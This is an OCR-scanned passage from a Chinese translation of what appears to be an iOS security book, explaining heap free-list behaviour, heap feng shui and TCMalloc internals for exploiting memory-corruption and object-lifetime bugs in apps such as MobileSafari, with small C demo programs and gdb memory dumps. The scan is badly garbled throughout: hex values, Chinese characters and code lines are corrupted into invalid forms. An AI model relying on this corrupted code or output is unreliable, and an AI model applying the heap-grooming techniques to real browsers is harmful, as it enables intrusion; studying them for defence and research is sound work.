target remote-mobile /tmp/ .XcodeGDBRemote-1923-40 

Switching to remote-macosx protocol 

mem 0x1000 Ox3fffffff cache 

mem Ox40000000 Oxffffffff none 

mem 0x00000000 Ox0fff none 

[Switching to process 7171 thread 0xlc03] 

[Switching to Process 7171 thread 0xlc03] 

sharedlibrary apply-load-rules all 

Current language: auto; currently objective-c 

(gdb) x/40x ptr1 

0x14fa50 : 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 

0Xx14fa60 : 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00000000 
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0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 
0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000 
0x14fa90: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 
0xl4faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00000000 
0x14fab0 : 0x00000000 0x00000000 0x00000000 0x00000000 
0x14fac0 : 0x00000000 0x00000000 0x00000000 0x00000000 
0x14fadq0 : Ox7665442f 0x706f6c65 0x752f7265 0x6c2f7273 
0x14fae0 : 0x6c2f6269 0x63586269 Ox4465646f 0x67756265 
(gdb) c 

Continuing. 


接 下 来 第 一 个 对 象 会 被 释放 : 


Program received signal SIGINT, Interrupt. 
main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest 
/booktest/main.m:34 








34 free (ptr3); 

(gdb) Xx/40x ptr1 

0x1l4fa50: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 

0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00000000 

0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 

0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000 

0xX14fa90 : 0xcccccccc 0xcccccccec 0xcccccccec 0xcccccccc 

0xl4faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00000000 

0x14fab0 : 0x00000000 0x00000000 0x00000000 0x00000000 

0x14fac0 : 0x00000000 0x00000000 0x00000000 0x00000000 

0x14fadq0 : Ox7665442f 0x706f6c65 0x752f7265 0x6c2f7273 

0x14fae0 : 0x6c2f6269 0x63586269 Ox4465646f 0x67756265 

(gdb) c 

Continuing. 

内 存 布局 还 没有 改变 ， 而 这 符合 我 们 之 前 作出 的 解释 。 事 实 上 ， 这 里 只 释放 了 ptr1， 相 应 
地 ， 它 被 放置 到 了 mag_last_free 缓 存 中 。 更 进一步: 





main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest 
/booktest/main.m:36 





36 free (ptr2); 

(gdb) x/40x ptrl 

Ox14fa50 : 0x90000000 0x90000000 0xaaaa0002 0xaaaaaaaa 
0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00020000 
0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 
0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000 
0x14fa90: 05Eeeeeeee 0xcccccccc 0xcccccccc 0xzaeeeeeeee 
0Ox14faa0 : 0xcccccccec 0xcccccccec 0x00000000 0x00000000 
0x14fab0 : 0x00000000 0x00000000 0x00000000 0x00000000 
0x14fac0 : 0x00000000 0x00000000 0x00000000 0x00000000 
0x1l4fad0: Ox7665442f 0x706f6c65 0x752f7265 0x6c2f7273 
0x14fae0 : 0x6c2f6269 0x63586269 Ox4465646f 0x67756265 
(gdb) c 

Continuing. 


现在 ptz3 也 被 释放 了 , 因此 必须 将 ptr1 从 mag_last_free 绥 存 中 移 走 , 也 就 是 说 它 实 际 上 
被 放 入 自由 列表 了 。 前 两 个 DwoRD 值 表示 自由 列表 中 的 前 驱 指 针 和 后 继 指 针 。 记 住 ， 指 针 是 要 和 
随机 生成 的 cookie 进 行 异 或 运算 的 ;大 家 很 容易 发 现 它们 都 为 NULL， 自 由 列表 之 前 其 实 是 空 的 。 
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下 一 个 要 释放 的 对 象 是 ptr2: 


Program received signal SIGINT, 
(argc=1, argv=0x2fdffbac) 











main 

/booktest/ main.m:38 

38 free(ptr4); 
(gdb) x/40x ptrl1 
0x14fa50 : 0x70014fa9 
0x14fa60 : 0xaaaaaaaa 
0x14fa70 : 0xbbbbbbbb 
0x14fa80 : 0xbbbbbbbb 
0x14fa90 : 0x90000000 
0xl4faa0: 0xcccccccc 
0x14fab0 : 0x00000000 
0x14fac0 : 0x00000000 
0x14fad0 : 0x7665442f 
0x14fae0 : 0x6c2f6269 
(gdb) c 

Continuing. 


0x90000000 
0xaaaaaaaa 
0xbbbbbbbb 
0xbbbbbbbb 
0x70014fa5 
UxCeeCececee 
0x00000000 
0x00000000 
0x706f6c65 
0x63586269 


Interrupt. 
at /Users/snagg/Documents/Book/booktest 


0xaaaa0002 
0x00000000 
0xbbbbbbbb 
0x00000000 
0xcccc0002 
0x00000000 
0x00000000 
0x00000000 
0x752f7265 
Ox4465646f 


0xaaaaaaaa 
0x00020000 
0xbbbbbbbb 
0x00000000 
Oxcccccceee 
0x00020000 
0x00000000 
0x00000000 
0x6c2f7273 
0x67756265 


这 里 情况 有 了 小 小 的 变化 。 现 在 ptr2 在 mag_last_free 绥 在 中 ， 而 ptz1 和 ptz3 都 在 自由 
列表 中 。 此外, ptz1 前 面 的 那个 指针 现在 已 指向 ptr3 , 而 ptr3 之 后 的 那个 指针 现在 已 指向 ptr1。 
最 后 ， 我 们 看 看 将 ptr4 放 人 mag_1last_free 缓 存 时 会 发 生 什 么 : 


Program received signal SIGINT, 
0x00002400 in main 


Interrupt. 
(arygec=1, argv=D0x2fdffbac}) at 


/Users/snagg/Documents/Book/booktest/booktest/main.m:39 


39 
(gdb) 


Ox14f 
Ox14f 
Ox14f 
Ox14f 
Ox14f 
Ox14f 


0x14 


Ox14f 


0x14 








Ox14f 


(gdb) 


DebugBreak () ; 
XxX/40x ptr1 
a50 : 0x90000000 
a60: 0xaaaaaaaa 
a70: 0xbbbbbbbb 
a80: 0xbbbbbbbb 
a90: 0x90000000 
aa0: 0xcccccccc 
Eap0 : 0x00000000 
ac0 : 0x00000000 
fado0: Ox7665442f 
ae0: 0x6c2f6269 


0x90000000 
0xaaaaaaaa 
0xbbbbbbbb 
0xbbbbbbbb 
0x90000000 
0xcccccccc 
0x00000000 
0x00000000 
0x706f6c65 
0x63586269 


0xaaaa0006 
0x00000000 
0xbbbbbbbb 
0x00000000 
0xcccc0002 
0x00000000 
0x00000000 
0x00000000 
0x752f7265 
Ox4465646f 


0xaaaaaaaa 
0x00020000 
0xbbbbbbbb 
0x00000000 
0xcccccccc 
0x00060000 
0x00000000 
0x00000000 
Dx6c2£7273 
0x67756265 


ptr2 的 内 容 似 乎 没有 改变 ， 不 过 其 他 情况 就 不 同 了 。 首 先 ，ptr1 与 ptr3 的 前 驱 指 针 和 后 继 
指针 都 被 置 为 NULL ， 而 且 ptr1 内 存 块 的 大 小 也 发 生 了 变化 。 事 实 上 现在 的 ptr1 已 经 长 96 字 节 
( 0x0006*16 字 节 ， 而 16 字 节 正 是 微型 内 存 块 量子 的 大 小 ) 了 。 这 意味 着 ptr1l1、ptr2 和 ptr3 全 部 


被 合并 到 一 个 不 含 其 他 元 素 的 


























内 存 块 中 ， 而 该 内 存 块 放置 在 具有 不 同 量子 ( 0x0006 ) 的 自由 列 


表 中 。 因 此 ， 它 们 各 自 的 前 驱 指 针 和 后 继 指 针 都 被 释放 了 。 对 应 0x0002 的 自由 列表 现在 为 空 。 


1. 针对 算术 漏洞 的 漏洞 攻击 
前 面 的 这 个 例子 彻底 讲 清 了 通过 重 写 堆 的 元 数据 让 代码 得 以 执行 的 思路 。 因 此 , 只 

















一 的 选择 








就 是 按照 特定 方式 分 配对 象 , 把 易 受 攻击 的 对 象 放置 在 要 重 写 的 对 象 旁 边 , 这 个 技巧 称 为 堆 风水 
( Heap Feng Shui )。 在 本 草 随 后 的 内 容 中 大 家 会 了 解 到 它 的 基础 知识 ， 并 学 会 如 何 针对 浏览 如 使 
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用 该 技巧 。 现 在 ， 大 家 只 需要 执行 以 下 简单 计划 : 

(1) 分 配 若 干 个 易 受 攻击 的 对 象 ; 

(2) 在 这 些 对 象 之 间 “ 挖 坑 ”; 

(3) 把 “有 意思 的 ”对 象 分 配 到 这 些 “ 坑 ” 中 。 

为 了 实现 这 一 目标 ， 大 家 可 以 利用 下 面 这 个 简单 的 应 用 程序 。 它 首先 会 分 配 50 个 对 象 ， 并 将 它 
们 的 内 容 置 为 0xcc。 然 后 这 些 对 象 有 一 半 会 被 释放 掉 ， 最 后 其 中 10 个 装 有 0xaa 的 对 象 要 进行 分 配 。 


#define DebugBreak() \ 








do{\ 

_asm ("mov r0, #20\nmov ip, rO\nsvc 128\nmov rl1l, #37\nmov ip, rl\nmov rl, #2\nmov 
r2, #1\n sve 128\n" 

b "mor 

} while (0) 


int main(int argc, char *argv[]) 

{ 
unsigned long *buggy[50]; 
unsigned long *interesting[10]; 
i 


oh sl 0 0 二 
buggy[i] = malloc(48); 
memset (buggy [i], Oxcc, 48); 

} 

DebugBreak (); 

for{(i = 49; 1 > 0; 1 ==2) 
free (buggy[i]); 


DebugBreak (); 





for{(1i = 0; 1 < 10; i++) { 
interesting[i] = malloc(48); 
memset (interesting[i], Oxaa, 48); 


} 
DebugBreak (); 


Gautoreleasepool { 
return UIApplicationMain(argc, argv, nil, NSStringFromClass 
([bookAppDelegate class])); 
} 
} 


首先 我 们 要 运行 该 应 用 程序 : 


GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011) 
Copyright 2004 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 

Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for details. 

This GDB was configured as "--host=i386-apple-darwin--target=arm-apple-darwin".tty 








i 
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/dev/ttys002 

target remote-mobile /tmp/ .XcodeGDBRemote-1923-73 
Switching to remote-macosx protocol 

mem 0x1000 Ox3fffffff cache 

mem 0x40000000 Oxffffffff none 

mem Ox00000000 0x0fff none 

[Switching to Process 7171 thread 0xlc03] 
[Switching to process 7171 thread 0xlc03] 
sharedlibrary apply-load-rules all 

Current language: auto; currently objective-c 
(gdb) x/50x buggy 











Ox2fdfface: 0x0017casd0 0x0017ca80 0x0017cab0 0x0017cae0 
0x2fdffadc: 0x0017cb10 0x0017cb40 0x0017cb70 0x0017cba0 
0x2fdffaec : 0x0017cbd0 05&0017ee00 02001278e30 0x0017cc60 
Ox2fdffafc: 0x0017cc90 0z&00T7eeeu 0x0017ccf0 0x0017cd20 
0x2fdffpboc : 0x00L7ed50 0x0017cd80 0x0017cdb0 0x0017cde0 
0x2fdffpblc : 0x0017cel10 0x0017ce40 0x0017ce70 0x0017cea0 
0x2fdffb2c;: 0x0017ceqd0 0x0017cf00 0x0017cf30 0x0017cf60 
0x2fdffpb3c : 0x0017cf90 0x0017cfc0 0x0017cff0 0x0017d020 
Ox2fdffb4c: 0x0017d050 0x0017d080 0x0017dq0b0 0x0017d0e0 
Ox2fdffb5c: 0x0017d110 0x0017d140 0x0017d170 0x0017d1la0 
Ox2fdffb6c: 0x0017d1g0 0x0017d200 0x0017d230 0x0017d260 
0x2fdffpb7c : 0x0017d290 0x0017d2c0 0x0017d2f£0 0x0017d320 
0x2fdffb8c: 0x0017d350 0x0017d380 

(gdb) x/15x 0x0017ca80 

0x17ca80 : 0xcccccccc 0xcccccccc 0xcccccccc 0xeececeece 
0x17ca90 : 0xcccccccc UxGGCcececece Uxececccee UXCCeccceee 
0x17caa0 : 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 
0x17capb0 : 0xcccccccc 0xcccccccc 0xcccccccc 

(gdqb) c 

Continuing. 





所 有 这 50 个 对 象 都 已 经 分 配 好 了 ， 而 且 每 个 对 象 都 如 预期 那样 被 装 入 了 0xcc。 接 着 ， 大 家 
可 以 看 到 释放 25 个 对 象 后 该 应 用 程序 的 状态 : 
Program received signal SIGINT, Interrupt. 


0x0000235a in main (argc=1, argv=0x2fdffbac) at 
/Users/snagg/Documents/Book/booktest/booktest/main.m:34 


34 DebugBreak (); 

(gdb) x/15x 0x0017cae0 

0x17cae0 : 0xa0000000 0xe0017cb4 0xcccc0003 0xcccccccc 
0x17caf0 : Oxccececcec 0Uxcecccecce 0xcccccccc 0xcccccccc 
0x17cb00 : USCeeeececce 0xcccccccc V0xccececee 0x0003cccc 
0x17cb10 : [Ob sielelolelelele: 0xcccccccc Uxeeeecececee 

(gdb) c 

Continuing. 


第 四 个 对 象 是 被 释放 对 象 中 的 一 员 ,具体 来 说 , 它 是 最 后 一 个 被 添加 到 自由 列表 中 的 对 象 ( 而 
第 一 个 对 象 其 实 被 存储 到 mag_last_free 缓 存 中 )。 它 的 前 驱 指 针 被 置 为 NJLL， 而 后 继 指 针 现 
在 指向 buggy 数 组 中 的 第 六 个 对 象 。 最 后 ， 大 家 要 分 配 自己 感 兴趣 的 对 象 : 


Program received signal SIGINT, Interrupt. 
0x000023fe in main (argc=1, argv=0x2fdffbac) at 
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/Users/snagg/Documents/Book/booktest/booktest/main.m:41 

41 DebugBreak () ; 

(gdb) x/10x interesting 

0x2fdffaa4: 0x0017ca80 0x0017cae0 0x0017cb40 0x0017cba0 
0x2fdffab4: 0x0017cc00 0x0017cc60 0x0017ccc0 0x0017cd20 
0x2fdffac4: 0x0017cgd80 0x0017cde0 

(gdb) x/15x 0x0017ca80 


0x17ca80: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 
0x17ca90: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 
0x17caa0 : 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 
0x17cab0: 0xcccccccec 0Geeeeeeee 0xGeeeeeee 





这 10 个 被 替换 的 对 象 是 之 前 释放 的 ， 不 出 所 料 ， 它 们 的 内 容 已 经 成 了 0xaa。 在 输出 中 ， 大 
家 可 以 看 到 buggy 数 组 中 第 一 个 对 象 的 内 容 ， 其 内 容 是 我 们 已 经 见 过 的 。 

虽然 存在 这 一 些 困难 , 但 在 现实 的 应 用 中 这 样 的 技巧 也 适用 。 具 体 来 讲 , 在 刚 开 始 进行 漏洞 
攻击 之 时 ， 堆 的 状态 是 未 知 的 ， 而 且 远 不 能 达到 “理想 状态 ”， 而 攻击 者 可 能 没有 足够 空间 按 自 
己 的 想法 分 配 那么 多 对 象 。 尽 管 这 样 ， 该 技巧 的 实用 性 和 适用 性 被 证 明 是 非常 好 的 。 在 本 章 随 后 
讨论 TCMalloc 时 ， 大 家 会 了 解 到 如 何 将 其 应 用 于 MobileSafari。 

2. 针对 对 象 生 存 期 问题 的 漏洞 攻击 

在 处 理 对 象 生存 期 问题 时 , 替换 内 存 中 易 受 攻击 对 象 的 能 力 至 关 重 要 。 这 在 合并 内 存 块 时 就 闵 
手 了 , 因为 对 象 大 小 有 可 能 会 发 生 一 些 不 可 预知 的 变化 。 一般 来 说 , 有 3 种 方式 可 以 解决 这 一 问题 : 
口 在 释放 易 受 攻击 的 对 象 后 立刻 替换 对 象 ; 
口 将 对 象 放 在 已 分 配 的 对 象 之 间 ; 
口 将 对 象 放 在 大 小 受 自 己 控 制 的 对 象 之 间 。 

在 采取 第 一 种 策略 时 ， 对 象 是 直接 从 mag_last_free 缓 存 中 取出 的 ， 因 此 不 会 发 生 合并 。 
而 第 二 种 方案 可 确保 后 继 对 象 和 前 驱 对 象 都 未 释放 , 还 时 可 以 确定 合并 是 不 可 能 的 。 最 后 一 种 情 
况 让 我 们 可 以 预测 要 合并 的 最 后 一 个 对 象 的 大 小 ,因此 能 分 配 一 个 大 小 适当 的 对 象 来 替换 。 想 使 
用 第 一 种 或 第 二 种 技巧 , 大 家 可 以 参考 本 章 之 前 介绍 过 的 例子 。 而 想 要 尝试 最 后 一 种 技巧 , 大 家 
可 以 利用 下 面 这 个 简单 的 应 用 程序 : 


#define DebugBreak() \ 









































dol{\ 

_asm ("mov r0, #20\nmov ip, r0O\nsvc 128\nmov rl1l, #37\nmov ip, 
rl\nmov rl, #2\nmov r2, #1\n svc 128\n" \ 
EMO EO EL 2) NN 

} while (0) 


int main(int argc, char *argv[]) 

{ 
unsigned long *ptrl1, *ptr2, *ptr3, *ptr4; 
unsigned long *replacement; 


ptrl = malloc(48); 
ptr2 = malloc(64); 
ptr3 = malloc( 


80) 
ptr4 malloc(24); 
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DebugBreak (); 


free (ptr1); 
free (ptr2) 
free (ptr3) 
free (ptr4) 

k 


DebugBrea 


7 


(有 
replacement = malloc(192) ; 
DebugBreak () ; 


@autoreleasepool { 
return UIApplicationMain(argc, argv, nil, NSStringFromClass 
([bookAppDelegate class])); 
} 
} 


该 应 用 程序 会 分 配 4 个 对 象 ， 而 各 个 对 象 的 大 小 都 是 不 同 的 。 目 标 是 要 替换 ptz2。 想 完成 
一 目标 ， 我 们 就 要 考虑 块 的 合并 ， 因 此 用 来 蔡 换 的 对 象 大 小 为 192 字 节 ， 而 非 64 字 节 。 运 行 
程序 就 可 以 验证 这 一 点 : 


GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011) 
Copyright 2004 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "--host=i386-apple-darwin --target=arm-apple-darwin". 
tty /dev/ttys002 

target remote-mobile /tmp/ .XcodeGDBRemote-1923-41 
Switching to remote-macosx protocol 

mem Ox1000 Ox3fffffff cache 

mem 0x40000000 Oxffffffff none 

mem 0x00000000 Ox0fff none 

[Switching to process 7171 thread 0xlc03] 
[Switching to process 7171 thread 0xlc03] 
sharedlibrary apply-load-rules all 

Current language: auto; currently objective-c 
(gdb) x/x ptrl1 

0x170760 : 0x00000000 

(gdb) c 

Continuing. 


ptr1 被 分 配 到 0x170760。 继 续 执 行 ， 我们 在 所 有 指针 都 被 释放 后 再 检查 其 内 容 : 











Program received signal SIGINT, Interrupt. 

0x0000240e in main (argc=1, argv=0x2fdffbac) at 
/Users/snagg/Documents/Book/booktest/booktest/main.m:34 

34 DebugBreak (); 

(gdb) x/4x ptrl 

0 区 1707605 0x20000000 0x20000000 0x0000000c 0x00000000 
(gdqb) c 

Continuing. 
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ptr1 被 指派 给 大 小 为 192 字 节 的 量子 0x000c。 看 起 来 大 家 已 在 正轨 之 上 了 。 最 后 , 应 用 程序 
会 分 配 用 于 替换 的 对 象 : 


Program received signal SIGINT， Interrupt. 

0x00002432 in main (argc=1, argv=0x2fdffbac) at 
/Users/snagg/Documents/Book/booktest/booktest/main.m:38 
38 DebugBreak (); 

(gdb) x/x replacement 

0x170760: 0x20000000 











(gdb) 
用 于 替换 的 对 象 被 正确 地 放置 在 内 存 中 ptr1 之 前 所 在 的 位 置 。 尽 管 进 行 了 数据 库 的 合并 ， 
ptr2 还 是 被 成 功 地 替换 了 。 





接 下 来 的 一 节 要 介绍 另 一 种 分 配 程序 ， 包 括 MobileSafari 在 内 的 诸多 应 用 程序 都 使 用 了 该 分 
配 程序 。 











7.4 理解 TCMalloc 


TCMalloc 分 配 程序 最 初 是 由 Sanjay Ghemawat 构 思 的 ， 它 在 多 线程 的 应 用 程序 中 应 该 会 尽 可 
能 地 快 。 事实 上 ， 该 分 配 程 序 的 整体 结构 将 线程 的 交互 和 锁定 减少 到 了 最 低 程度 。 

我 们 对 TCMalloc 极 有 兴趣 ， 因 为 它 是 WebKit 选 用 的 分 配 程 序 。 在 本 节 中 ， 大 家 会 深入 了 人 解 
它 的 工作 原理 ， 并 理解 如 何 利用 它 满足 攻击 者 的 需求 。 

TCMalloc 处 理 大 对 象 分 配 和 小 对 象 分 配 有 两 种 不 同 的 机 制 。 其 中 大 对 象 由 名 为 Pageheap 的 程 
序 管理 , 而 且 会 直接 被 转 给 之 前 讨论 过 的 底层 操作 系统 自 带 的 分 配 程序 处 理 , 而 小 对 象 则 完全 是 
由 TCMalloc 处 理 的 。 


7.4.1 大 对 象 的 分 配 和 释放 


在 为 大 于 用 户 设 定 阔 值 kMaxsize 的 对 象 分 配 内 存 时 ， 我们 要 用 到 页 面 级 的 分 配 程序 。 页 面 
级 的 分 配 程序 Pageheap 分 配 的 是 范围 (span )， 即 一 组 连续 的 内 存 页 。 

首先 我 们 要 看 看 由 已 分 配 的 范围 构成 的 双向 链表 ， 看 看 有 没有 合适 的 大 小 可 供 TCMalloc 使 
用 。 在 这 个 双向 链表 中 有 两 类 范围 , 一 类 是 可 供 使 用 的 , 而 男 一 类 则 是 由 TCMalloc 分 配 但 要 返回 
给 底层 系统 堆 的 。 

在 有 自由 的 范围 可 供 使 用 时 , 它 首 先 会 被 重新 分 配 ， 然 后 再 返回 。 不过， 如 果 范 围 可 用 而 且 
未 被 标记 为 已 释放 , 那么 它 会 被 直接 返回 。 如 果 没 有 大 小 适当 的 范围 可 用 ,页 面 级 的 分 配 程序 会 
试 着 找到 一 个 “足够 满足 要 求 ”的 更 大 的 范围 ,也 就 是 说 ， 这 个 范围 的 大 小 要 尽 可 能 接近 所 请 求 
大 小 。 一 旦 分 配 程 序 找到 这 样 的 范围 ， 它 就 会 分 割 这 个 范围 ， 让 其 余 的 内 存 可 供 后 续 使 用 ,并 返 
回 大 小 恰当 的 范围 。 

如 果 没 有 合适 的 范围 可 供 使 用 , 它 就 会 向 底层 操作 系统 请 求 一 组 新 的 内 存 页 , 并 将 其 分 为 两 
个 内 存 对 象 : 一 个 对 象 有 着 所 请 求 的 大 小 ,而 另 一 个 对 象 的 大 小 则 是 分 配 的 内 存 页 的 总 大 小 减 去 
所 请 求 的 分 配 所 需 的 内 存 大 小 。 
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当 我 们 不 再 需要 某 一 范围 时 ， 首 先 会 将 其 与 它 的 前 驱 范 围 、 后 继 范围 或 是 这 两 者 合并 起 来 ， 
然后 将 得 到 的 范围 标记 为 已 释放 。 最 后 ,依据 若干 个 用 户 定 义 的 参数 , 合并 后 得 到 的 范围 会 由 垃 
圾 收集 需 返 回 给 系统 ， 具体 地 讲 ， 就 是 在 已 释放 的 范围 数 大 于 targetPageCount 时 。 


7.4.2 小 对 象 的 分 配 


分 配 小 对 象 所 使 用 的 机 制 则 很 令 人 费解 。 每 个 正在 运行 的 线程 都 具有 自己 专用 的 对 象 缓存 和 
自由 列表 。 自由 列表 是 分 成 若干 分 配 类 的 双向 链表 。 小 于 1024 字 节 的 对 象 是 按照 如 下 方式 计算 的 : 
(object_size + 7)/8。 

而 对 于 大 于 该 值 的 对 象 来 说 ， 计 算 方式 则 是 : (object_size + 127 + (120<<7))/128。 

除了 每 个 线程 的 缓存 ， 其 中 还 有 中 央 缓 存 。 中 央 缓 存 是 由 所 有 线程 共享 的 , 而 且 与 线程 缓存 
有 着 相同 的 结构 。 

在 请 求 进行 新 的 分 配 时 , 分 配 程 序 首先 会 检索 当前 线程 的 线程 缓存 , 并 查看 该 线程 的 自由 列 
表 ， 验 证 是 否 有 位 置 可 供 合 适 的 分 配 类 使 用 。 如 果 这 些 尝试 失败 了 ， 分 配 程序 会 查看 中 央 绥 存 ， 
并 从 中 取 回 对 象 。 出 于 性 能 的 考虑 ， 如 果 线 程 缓存 被 强制 向 中 央 缓 存 请 求 可 用 对 象 ， 而 不 是 直接 
传送 线程 缓存 中 的 对 象 ， 就 会 有 一 整 段 对 象 被 取出 。 

如 果 线 程 缓存 和 中 央 缓 存 都 没有 具备 合适 分 配 类 的 对 象 , 这 些 对 象 就 会 被 按照 获取 大 对 象 的 
方式 直接 从 范围 中 取出 。 


7.4.3 ”小 对 象 的 释放 


在 释放 小 对 象 时 , 它 会 被 返回 到 线程 缓存 的 自由 列表 。 自 由 列表 超出 了 用 户 定义 的 参数 时 会 
进行 垃圾 回收 。 

然后 , 垃圾 回收 顺 会 把 线程 缓存 自由 列表 中 的 未 使 用 对 象 返 回 给 中 央 缓 存 自由 列表 。 因 为 中 
央 绥 存 中 的 所 有 对 象 都 是 来 自 范 围 的 ， 所 以 每 当 有 一 组 新 对 象 被 重新 指定 给 中 央 缓 存 自 由 列表 ， 
分 配 程序 都 会 验证 这 些 对 象 所 属 的 范围 是 否 完全 是 自由 的 。 如 果 是 , 它 就 把 该 范围 标记 为 已 释放 ， 
并 最 终 将 其 返回 给 系统 ， 如 同 之 前 介绍 大 对 象 分 配 时 解释 的 那样 。 


































































































7.5 驯服 TCMalloc 


本 节 要 讨论 一 些 针 对 TCMalloc 的 技巧 , 我 们 可 以 利用 这 些 技巧 控制 堆 布局 , 从 而 最 大 限度 地 
预知 堆 布 局 。 具 体 地 讲 ， 本 节 会 解释 就 对 象 生存 期 问题 展开 漏洞 攻击 需要 的 步骤 ,并 探讨 名 为 堆 
风水 的 技巧 。 最 早 公 开 讨 论 该 技巧 的 是 Alex Sotirov， 当 时 它 是 针对 IE 的 堆 溢 出 问题 专门 用 来 对 IE 
进行 漏洞 攻击 的 。 不 过 ， 同 样 的 概念 基本 上 适用 于 市 面 上 可 见 的 每 种 堆 实 现 。 


7.5.1 获得 可 预知 的 堆 布 局 


要 获得 可 预知 的 堆 布 局 , 首先 我 们 需要 找到 一 种 有 效 的 方法 来 触发 垃圾 收集 器 。 这 在 针对 对 
象 生 存 期 问题 的 情况 中 是 特别 重要 的 ， 因 为 多 数 情 况 下 对 象 其 实 要 到 进行 垃圾 收集 时 才 会 被 释 
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放 。 最 显 见 的 垃圾 收集 器 触发 方式 就 是 使 用 JavaScript。 不 过 ， 这 意味 着 所 使 用 的 技巧 是 依赖 
JavaScript 引 人 擎 的 。 

在 WebKit 发 布 包 的 JavascriptCore 文 件 夹 中 ， 大 家 可 以 找到 代号 为 Nitro 的 MobileSafari 
JavaScript 引 擎 。 通 过 JavaScript 分 配 的 各 个 对 象 都 会 被 打包 成 JSCcell 结 构 。Nitro 的 行为 会 对 
TCMalloc 的 垃圾 收集 器 产生 很 深 的 影响 。 事 实 上 , 直到 要 使 用 JSCell 时 那些 内 存 对 象 才 会 被 释放 。 

为 了 更 好 地 理解 这 一 概念 , 我 们 来 看 看 MobileSafari 中 HTML div 对 象 的 释放 过 程 。 我 们 首先 
要 分 配 10 个 HTML aiv 对 象 ， 然 后 释放 它们 ， 并 使 用 函数 (本 例 中 是 Math .acos ) 从 调试 需 了 解 
释放 要 在 何 时 发 生 。 最 后 ， 我 们 会 分 配 大 量 的 对 象 ， 看 看 对 象 的 释放 究竟 是 何 时 发 生 的 。 


Breakpoint 6, 0x9adbclbb in WebCore: :HTMLDivElement::create () 
(gdb) info reg 











eax 0x28f0c0 2683072 

ecx Ox40 64 

edx 0x40 64 

ebx 0xc006ba88 -1073300856 
esp 0xc006b2a0 0xc006b2a0 
ebp 0xc006b2b8 0xc006b2b8 
esi Ox9adbclae -1696874066 
eqdi 0xc006ba28 -1073300952 
eip 0x9adbclbb 0x9adbclbb 


<WebCore: :HTMLDivEl]ement::create (WebCore: :QualifiedName constg&, 
WebCore: :Document*)+27> 





eflags 0x282 642 
Ss 0xlb 27 
ss 0x23 35 
ds 0x23 35 
es 0x23 35 
fs 0x0 0 

gs Oxf 15 


(gdb) awatch *(int x)0x28f0c0 

Hardware access (read/write) watchpoint 8: *(int *) 2683072 
(gdb) c 

Continuing. 

Hardware access (read/write) watchpoint 8: *(int *) 2683072 


giv 对 象 被 存储 在 EAX 中 。 大 家 可 以 为 其 设置 一 个 内 存 观察 点 , 方便 在 执行 期 间 对 其 进行 追踪 。 

Breakpoint 4，0x971f9ee5 in JSC::mathProtoFuncACos () 

(gdb) 

现在 应 该 到 了 要 释放 对 象 的 地 方 了 , 不 过 输出 表明 对 象 并 没有 被 释放 , 直到 TCMalloc 牵 涉 进 
来 。 进 一 步 深入 就 会 得 到 以 下 结果 : 

(gdb) continue 


Continuing. 
Hardware access (read/write) watchpoint 8: *(int *) 2683072 





Value = -1391648216 

0x9ad7ee0e in WebCore::JSNodeOwner::isReachableFromOpaqueRoots () 
(gdb) 

Continuing. 

Hardware access (read/write) watchpoint 8: *(int *) 2683072 
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Value = -1391648216 

0x9ad7ee26 in WebCore::JSNodeOwner::isReachableFromOpaqueRoots () 
(gdb) 

Continuing. 

Hardware access (read/write) watchpoint 8: *(int *) 2683072 


Old value = -1391648216 





New value = -1391646616 
0x9b4f141c in non-virtual thunk to WebCore: :HTMLDivElement::~HTMLDivElement() () 
gdb) bt 20 


0 0O0x9b4f141c in non-virtual thunk to WebCore: :HTMLDivElement 
::~HTMLDivElement() () 
1 0x9adf60d2 in WebCore: :JSHTMLDivElement::~JSHTMLDivElement () 

2 0x970c5887 in JSC::MarkedBlock::sweep () 

Previous frame inner to this frame (gdb could not unwind past this frame) 
gdp) 


因此 ， 只 有 在 Nitro 的 垃圾 收集 器 被 调用 后 ， 对 象 才 会 被 释放 。 那 么 ， 理 解 Nitro 的 垃圾 收集 
器 何 时 被 触发 以 及 如 何 被 触发 就 非常 重要 了 。 

Nitro 的 垃圾 收集 右 会 在 以 下 3 种 情况 下 被 调用 : 

口 在 编译 时 设置 超时 后 ; 

口 在 JavaScript 全 局 数据 被 销毁 ( 也 就 是 线程 死亡 ) 后 ; 

口 当 分 配 的 字 节 数 超出 某 一 界限 值 时 。 

很 显然 ， 要 控制 垃圾 收集 器 ， 最 简单 的 选择 就 是 利用 第 三 种 情况 。 整 个 过 程 与 前 一 个 例子 中 
